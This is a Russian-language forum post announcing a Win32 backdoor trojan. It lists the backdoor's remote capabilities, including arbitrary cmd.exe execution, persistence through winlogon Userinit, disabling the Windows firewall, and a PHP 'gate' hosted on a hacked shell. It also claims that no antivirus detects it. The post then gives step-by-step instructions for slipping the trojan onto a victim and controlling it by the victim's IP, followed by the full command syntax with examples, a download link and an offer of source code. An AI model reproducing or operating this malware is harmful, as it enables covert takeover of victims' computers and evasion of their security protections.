многофункциональный бэкдор под Win32-системы, работающий по
архитектуре "клиент-сервер", с помощью которого можно практически полностью контролировать
зараженную систему.
Возможности:
- Выполнять любые команды в системе через коммандный интерпретатор cmd.exe
- Работа с файловой системой через cmd.exe
- Запускать любые программы в системе
- Выводить свое сообщение
- Выключать/Перезагужать/Завершить сеанс зараженной машины
- Закрывать/Открывать CD-ROM
- Включать/Выключать монитор
- Устанавливать свои собственные обои
- Выставлять мышь на левшу/правшу
- Установка курсора в разные координаты (:
- Включать/Выключать Scroll Lock, Num Lock, Caps Lock на клавиатуре
- Прятать кнопку "ПУСК", панель со свернутыми окнами, Quick Launch, часы, трей и т.д
Фичи:
- Автозагрзука из под winlogon (Userinit).
- Вырубает встроенный Windows-файрвол (ICF/ICS и WSCSVC), который блокирует коннекты к машине
- Управление зараженной машиной через PHP-гейт. Теперь об анонимности можно беспокоиться в два раза меньше.
- Маленький размер сервера. Всего ~4,50 килобайт (паковал FSG, компилил LCC, так что возможно еще меньше).
- На момент релиза, ни один антивирус не определил троянский код.
Впариваем троян (/server/server.exe) ламеру. Затем заливаем на шелл скрипт управлением трояном (/web/gate.php).
На шелле должен быть установлен PHP и поддерживаться работа с сокетами. Узнаем IP-адрес ламера. Заходим на
скрипт:
http://shell/sbg.php?....0.1&port=5745, где 127.0.0.1 - это IP-адрес жертвы. Затем вводим команды
в одно единственное поле.
----[ 0x02: команды
команды без аргументов:
CODE
hide_panel / show_panel
hide_start / show_start
hide_rebar / show_rebar
hide_quicklaunch / show_quicklaunch
hide_tasksw / show_tasksw
hide_trey / show_trey
hide_treybutton / show_treybutton
hide_treyicon / show_treyicon
hide_time / show_time
mouse_on / mouse_off
mouse_swap_on / mouse_swap_off
numlock_on / numlock_off
capslock_on / capslock_off
scrolllock_on / scrolllock_off
keyboard_on / keyboard_off
monitor_on / monitor_off
cdrom_open / cdrom_close
logof / power / rboot / stand / sleep
about
beep
команды c аргументами:
CODE
set_wallpaper^C:\путь\к\картинке\в\формате.BMP
cmd^комманда
messagebox^текст_сообщения^заголовок_сообщения
crazy_cdrom^кол-во_выдвигов/задвигов
crazy_mouse^частота_сдвигов(мл.сек)^кол-во_раз
Примеры ввода команд:
CODE
monitor_off
messagebox^Hacked by SN!KE=))^
cmd^dir
cmd^type C:\a.txt
Короче говоря ^ - разделитель.
_
https://softoroom.org/...v0.01_beta.rarЗ.Ы. При желании могу выложить исходник.